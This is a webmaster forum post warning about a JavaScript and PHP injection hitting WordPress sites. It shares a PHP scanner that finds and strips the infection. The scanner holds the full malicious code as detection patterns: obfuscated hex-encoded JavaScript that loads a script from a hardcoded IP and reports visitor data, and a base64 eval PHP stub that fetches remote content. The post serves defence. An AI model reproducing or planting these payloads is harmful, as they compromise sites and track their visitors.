Just wanted to share this with you as it might affect your traffic. Funny thing is that Google doesn't report it yet as badware.
There is a new kind of JS malware virus that injects code to make 1pixel iframes and connects to certain sites.
I just scanned 150 domains and some of my WP installs where infected.
Here is a link from a German coder offering a workable solution. Copy the code in a php file and upload it to the root of your server.
Once done type
www.xxxx.xx/filename.php to start scanning your files.
It also disinfects your code. Here the links:
http://forum.nexoneu.com/NXEU.aspx?g=posts&m=3143118
http://blog.insidecomp.com/?p=33#more-33
PHP Code:
<pre><!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>INSIDE Computer MalwareCheck 0.1</title>
</head>
<body>
<h1>Javascript und PHP Files werden auf Befall gecheckt:</h1>
<?php
echo '<h2>Startverzeichnis:'.getcwd().'</h2><br/>';
// dir_walk('/hp/ac/ab/vt/www/spd2011', 'showFiles');
$files_checked = 0;
$files_infected = 0;
echo '<table>';
dir_walk(getcwd(), 'checkFiles');
echo '</table>';
echo '<h2>Files checked: '.$files_checked.'<br/></h2>';
echo '<h2>Files infected: '.$files_infected.'<br/></h2>';
if ($files_infected == 0)
{
echo 'Alles im grünen Bereich...';
}
function dir_walk($start_dir, $func) {
$entries = scandir($start_dir);
foreach ($entries as $entry) {
if ($entry == '.' || $entry == '..') {
/* skip these */
} else if (is_dir($start_dir . '/' .$entry)) {
echo '<tr><td><b>Scanning...'.$start_dir . '/' . $entry.'</b></td></tr>';
dir_walk($start_dir . '/' . $entry, $func);
} else
$func($start_dir . '/' . $entry);
}
}
function checkFiles($filename) {
global $html_files;
// disindect javascriptFiles
if (strpos($filename, '.js') === (strlen($filename) - 3))
{
echo '<tr><td>.js-File checking: '.$filename.'<td>';
$pattern='var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;';
disinfect($filename, $pattern);
}
if (strpos($filename, '.php') === (strlen($filename) - 4))
{
echo '<tr><td>.js-File checking: '.$filename.'<td>';
$pattern='<?php $_F=__FILE__;$_X=\'Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+\';eval(base64_decode(\'JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw==\'));$ua = urlencode(strtolower($_SERVER[\'HTTP_USER_AGENT\']));$ip = $_SERVER[\'REMOTE_ADDR\'];$host = $_SERVER[\'HTTP_HOST\'];$uri = urlencode($_SERVER[\'REQUEST_URI\']);$ref = urlencode($_SERVER[\'HTTP_REFERER\']);$url = $url.\'?ip=\'.$ip.\'&host=\'.$host.\'&uri=\'.$uri.\'&ua=\'.$ua.\'&ref=\'.$ref; $tmp = file_get_contents($url); echo $tmp; ?>';
disinfect($filename, $pattern);
}
}
function restore_hsc($val){
$val = str_replace('&', '&', $val);
$val = str_replace('ö', '?', $val);
$val = str_replace('ä', '?', $val);
$val = str_replace('ü', '?', $val);
$val = str_replace('<', '<', $val);
$val = str_replace('>', '>', $val);
$val = str_replace('"', '"', $val);
return $val;
}
function disinfect($filename, $pattern) {
global $files_checked;
$files_checked++;
$pattern=trim(htmlspecialchars($pattern)); //prepare pattern
$lines = file($filename);
$found=0;
for ($i=0; $i<sizeof($lines); $i++) {
$current_line=trim(htmlspecialchars($lines[$i]));
if(strstr($current_line, $pattern)) {
$lines[$i]=str_replace($pattern, "", htmlspecialchars(trim($lines[$i])));
$lines[$i]= preg_replace('/\s\s+/', ' ', $lines[$i]);
$lines[$i]=restore_hsc($lines[$i]);
$found++;
}
}
$lines = array_values($lines);
if ($found >0) {
global $files_infected;
$files_infected++;
$file = fopen($filename, "w");
fwrite($file, implode("\n",$lines));
fclose($file);
touch($file);
echo " <td><span style=\"color:red;\"> is infected. Cured: $found injected objects</span></td></tr>";
}
else {echo " <td><span style=\"color:green;\"> - File is clean</span></td></tr>";}
}
?>
</body>
</html>